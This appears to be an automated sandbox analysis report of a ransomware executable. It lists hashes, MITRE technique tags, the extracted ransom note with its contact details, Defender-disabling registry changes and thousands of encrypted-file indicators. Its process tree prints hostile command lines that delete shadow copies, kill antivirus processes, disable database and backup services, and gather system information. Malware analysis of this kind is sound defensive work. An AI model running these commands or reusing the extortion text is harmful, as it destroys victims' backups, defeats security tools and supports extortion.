699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd

Analysis

max time kernel
66s
max time network
54s
platform
windows7_x64
resource
win7-en-20211208
submitted
15-01-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

enc.exe
Size

156KB
MD5

14ee62fcc9163509856671400429ad55
SHA1

7544332b52769ca853d900669ef5e272a2ae1665
SHA256

699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd
SHA512

4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff

Score

10^/10

evasion ransomware trojan

Malware Config

Extracted

Path

C:\Documents and Settings\Admin\Cookies\Low\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt

Ransom Note

--=== Hello. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. All sensitive information also leaked. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] You have two ways: 1) [Recommended] Using an email Just write us an email to wilhelmkox@tutanota.com 2) Quick contact with us or if you will not receive our letters download qTox and ADD our TOXID: F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F How to download QTOX: - https://tox.chat/download.html - https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe Add our mails to contacts so as not to lose letters from us. Check your spam sometimes, our emails may get there. [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your UserID: 7A7483EFBB230F1AF454DEFDC275DC3B28FDECC31A7D792C4F07654230DC20BAE917723011722D886EC84F1818076A81378EEAE6D9682D4804DD8C6EB9D1965733AF86DCB04D35A1A436F36C327447D4FBC9E9CE2B6B19FD05DA2B92E8516738CFDF5D080D140AE5FB327884AD4850EDD7CCEBEF732CA5621A7EE333611666EE6A7D0A37DD55CAD80F0A45B88735AB2B59AB454E1F8E1B0707914EDE3478FC8FCFECB76547B5953F5850A8791C8CC2129F8270D0CE48092A1010997BC8932F7EAF24C9C48517931876520793F1C4B62A0465F36C50F4887B72829967D400C72B65EA4F9A2D1C35CB0D0AF6455EAD9F143C004E1FD1C316A46A50EA375BA8F33F3082010A0282010100CA0884DA183B3DF185C2154577450CD2AE596CC0C6C5D7F737898A1FCE3277AE34E010BB7E01AED9B87BDFB547BA9D2E9DE35918554C842C0678ACA42E3E9898E2269DB72B40056D3E7D3880B52FBA530EBE0492D54798EC0FFF65AF359BEC5B25661A560B28AA20F3F123B2AA687B0B751B4B8812202753DC9FB9B3A52B5C87CB9F0532AB5A11D70EFAA9D3796455DAF2D475FF31CB28FD6167418A5EA271E6E6B2C894D61DEF64DB3A64DD466866DBC5DA38F0CE565D773380A982D59810B50A35F85057B9678CFE0F5A7B7B0E492F09AB17EA14D74155443847A34558FC32935CC167B77B11208C4D2BC278F54DABC2989490D6D3686DA728DC64994D3A390203010001CCD38E2B9F45AFD06FF32FC77EF180DA4A45574C44

Emails

wilhelmkox@tutanota.com

URLs

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables taskbar notifications via registry modification
evasion
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

940 cmd.exe

pid	process
940	cmd.exe

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

enc.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	enc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1"	enc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0"	enc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1"	enc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0"	enc.exe

Drops file in Program Files directory 64 IoCs

Processes:

enc.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.IN.XML.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_decreaseindent.gif.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0075478.GIF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.KOXIC_JEWLD	enc.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Access.en-us\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.ID.XML.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18253_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\css\settings.css.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\COMPASS.INF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01585_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar.KOXIC_JEWLD	enc.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png.KOXIC_JEWLD	enc.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH.HXS.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\PREVIEW.GIF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.KOXIC_JEWLD	enc.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00882_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui.KOXIC_JEWLD	enc.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado20.tlb.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-compat.xml_hidden.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\flyout.html.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\localizedStrings.js.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18239_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\DVD Maker\audiodepthconverter.ax.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\slideShow.css.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendtoOneNoteFilter.gpd.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\blacklist.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Merida.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.ELM.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui.KOXIC_JEWLD	enc.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\drag.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00136_.WMF.KOXIC_JEWLD	enc.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\ja-JP\wmplayer.exe.mui.KOXIC_JEWLD	enc.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1048 ipconfig.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

860 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

520 taskkill.exe
NTFS ADS 1 IoCs

Processes:

enc.exe

description ioc process

File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.apiC:\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt enc.exe
Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

notepad.exeNOTEPAD.EXE

pid process

1552 notepad.exe
1832 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1800 PING.EXE

pid	process
1048	ipconfig.exe

pid	process
860	vssadmin.exe

pid	process
520	taskkill.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.apiC:\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt	enc.exe

pid	process
1552	notepad.exe
1832	NOTEPAD.EXE

pid	process
1800	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exevssvc.exeenc.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeBackupPrivilege	1820	vssvc.exe
Token: SeRestorePrivilege	1820	vssvc.exe
Token: SeAuditPrivilege	1820	vssvc.exe
Token: SeBackupPrivilege	952	enc.exe
Token: SeRestorePrivilege	952	enc.exe
Token: SeManageVolumePrivilege	952	enc.exe
Token: SeTakeOwnershipPrivilege	952	enc.exe
Token: SeIncreaseQuotaPrivilege	2040	WMIC.exe
Token: SeSecurityPrivilege	2040	WMIC.exe
Token: SeTakeOwnershipPrivilege	2040	WMIC.exe
Token: SeLoadDriverPrivilege	2040	WMIC.exe
Token: SeSystemProfilePrivilege	2040	WMIC.exe
Token: SeSystemtimePrivilege	2040	WMIC.exe
Token: SeProfSingleProcessPrivilege	2040	WMIC.exe
Token: SeIncBasePriorityPrivilege	2040	WMIC.exe
Token: SeCreatePagefilePrivilege	2040	WMIC.exe
Token: SeBackupPrivilege	2040	WMIC.exe
Token: SeRestorePrivilege	2040	WMIC.exe
Token: SeShutdownPrivilege	2040	WMIC.exe
Token: SeDebugPrivilege	2040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2040	WMIC.exe
Token: SeRemoteShutdownPrivilege	2040	WMIC.exe
Token: SeUndockPrivilege	2040	WMIC.exe
Token: SeManageVolumePrivilege	2040	WMIC.exe
Token: 33	2040	WMIC.exe
Token: 34	2040	WMIC.exe
Token: 35	2040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2040	WMIC.exe
Token: SeSecurityPrivilege	2040	WMIC.exe
Token: SeTakeOwnershipPrivilege	2040	WMIC.exe
Token: SeLoadDriverPrivilege	2040	WMIC.exe
Token: SeSystemProfilePrivilege	2040	WMIC.exe
Token: SeSystemtimePrivilege	2040	WMIC.exe
Token: SeProfSingleProcessPrivilege	2040	WMIC.exe
Token: SeIncBasePriorityPrivilege	2040	WMIC.exe
Token: SeCreatePagefilePrivilege	2040	WMIC.exe
Token: SeBackupPrivilege	2040	WMIC.exe
Token: SeRestorePrivilege	2040	WMIC.exe
Token: SeShutdownPrivilege	2040	WMIC.exe
Token: SeDebugPrivilege	2040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2040	WMIC.exe
Token: SeRemoteShutdownPrivilege	2040	WMIC.exe
Token: SeUndockPrivilege	2040	WMIC.exe
Token: SeManageVolumePrivilege	2040	WMIC.exe
Token: 33	2040	WMIC.exe
Token: 34	2040	WMIC.exe
Token: 35	2040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1912	WMIC.exe
Token: SeSecurityPrivilege	1912	WMIC.exe
Token: SeTakeOwnershipPrivilege	1912	WMIC.exe
Token: SeLoadDriverPrivilege	1912	WMIC.exe
Token: SeSystemProfilePrivilege	1912	WMIC.exe
Token: SeSystemtimePrivilege	1912	WMIC.exe
Token: SeProfSingleProcessPrivilege	1912	WMIC.exe
Token: SeIncBasePriorityPrivilege	1912	WMIC.exe
Token: SeCreatePagefilePrivilege	1912	WMIC.exe
Token: SeBackupPrivilege	1912	WMIC.exe
Token: SeRestorePrivilege	1912	WMIC.exe
Token: SeShutdownPrivilege	1912	WMIC.exe
Token: SeDebugPrivilege	1912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1912	WMIC.exe
Token: SeRemoteShutdownPrivilege	1912	WMIC.exe
Token: SeUndockPrivilege	1912	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

enc.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 952 wrote to memory of 948	952	enc.exe	cmd.exe
PID 952 wrote to memory of 948	952	enc.exe	cmd.exe
PID 952 wrote to memory of 948	952	enc.exe	cmd.exe
PID 952 wrote to memory of 948	952	enc.exe	cmd.exe
PID 948 wrote to memory of 520	948	cmd.exe	taskkill.exe
PID 948 wrote to memory of 520	948	cmd.exe	taskkill.exe
PID 948 wrote to memory of 520	948	cmd.exe	taskkill.exe
PID 948 wrote to memory of 520	948	cmd.exe	taskkill.exe
PID 952 wrote to memory of 564	952	enc.exe	cmd.exe
PID 952 wrote to memory of 564	952	enc.exe	cmd.exe
PID 952 wrote to memory of 564	952	enc.exe	cmd.exe
PID 952 wrote to memory of 564	952	enc.exe	cmd.exe
PID 564 wrote to memory of 860	564	cmd.exe	vssadmin.exe
PID 564 wrote to memory of 860	564	cmd.exe	vssadmin.exe
PID 564 wrote to memory of 860	564	cmd.exe	vssadmin.exe
PID 564 wrote to memory of 860	564	cmd.exe	vssadmin.exe
PID 952 wrote to memory of 1176	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1176	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1176	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1176	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2044	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2044	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2044	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2044	952	enc.exe	cmd.exe
PID 2044 wrote to memory of 2040	2044	cmd.exe	WMIC.exe
PID 2044 wrote to memory of 2040	2044	cmd.exe	WMIC.exe
PID 2044 wrote to memory of 2040	2044	cmd.exe	WMIC.exe
PID 2044 wrote to memory of 2040	2044	cmd.exe	WMIC.exe
PID 952 wrote to memory of 1800	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1800	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1800	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1800	952	enc.exe	cmd.exe
PID 952 wrote to memory of 972	952	enc.exe	cmd.exe
PID 952 wrote to memory of 972	952	enc.exe	cmd.exe
PID 952 wrote to memory of 972	952	enc.exe	cmd.exe
PID 952 wrote to memory of 972	952	enc.exe	cmd.exe
PID 972 wrote to memory of 1912	972	cmd.exe	WMIC.exe
PID 972 wrote to memory of 1912	972	cmd.exe	WMIC.exe
PID 972 wrote to memory of 1912	972	cmd.exe	WMIC.exe
PID 972 wrote to memory of 1912	972	cmd.exe	WMIC.exe
PID 952 wrote to memory of 1064	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1064	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1064	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1064	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2008	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2008	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2008	952	enc.exe	cmd.exe
PID 952 wrote to memory of 2008	952	enc.exe	cmd.exe
PID 2008 wrote to memory of 1964	2008	cmd.exe	WMIC.exe
PID 2008 wrote to memory of 1964	2008	cmd.exe	WMIC.exe
PID 2008 wrote to memory of 1964	2008	cmd.exe	WMIC.exe
PID 2008 wrote to memory of 1964	2008	cmd.exe	WMIC.exe
PID 952 wrote to memory of 1612	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1612	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1612	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1612	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1112	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1112	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1112	952	enc.exe	cmd.exe
PID 952 wrote to memory of 1112	952	enc.exe	cmd.exe
PID 1112 wrote to memory of 1580	1112	cmd.exe	WMIC.exe
PID 1112 wrote to memory of 1580	1112	cmd.exe	WMIC.exe
PID 1112 wrote to memory of 1580	1112	cmd.exe	WMIC.exe
PID 1112 wrote to memory of 1580	1112	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\enc.exe
"C:\Users\Admin\AppData\Local\Temp\enc.exe"
1⤵
- Windows security modification
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM MSASCuiL.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
2⤵
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:860

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo OS INFO: > %TEMP%\NTNNFVAWI"
2⤵
PID:1176

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\NTNNFVAWI"
2⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic OS get Caption,CSDVersion,OSArchitecture,Version
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo BIOS INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1800

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\NTNNFVAWI"
2⤵
- Suspicious use of WriteProcessMemory
PID:972

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo CPU INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1064

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\NTNNFVAWI"
2⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
3⤵
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\NTNNFVAWI"
2⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic MEMPHYSICAL get MaxCapacity
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\NTNNFVAWI"
2⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\NTNNFVAWI"
2⤵
PID:576

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
3⤵
PID:948

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo NIC INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1492

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\NTNNFVAWI"
2⤵
PID:916

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic NIC get Description, MACAddress, NetEnabled, Speed
3⤵
PID:1056

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo DISKDRIVE INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1144

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\NTNNFVAWI"
2⤵
PID:1448

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic DISKDRIVE get InterfaceType, Name, Size, Status
3⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo USERACCOUNT INFO: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\NTNNFVAWI"
2⤵
PID:1912

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
3⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo IPCONFIG: >> %TEMP%\NTNNFVAWI"
2⤵
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /c "ipconfig >> %TEMP%\NTNNFVAWI"
2⤵
PID:1964

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:1048

C:\Windows\SysWOW64\cmd.exe
cmd /c "echo DATABASES FILES: >> %TEMP%\NTNNFVAWI"
2⤵
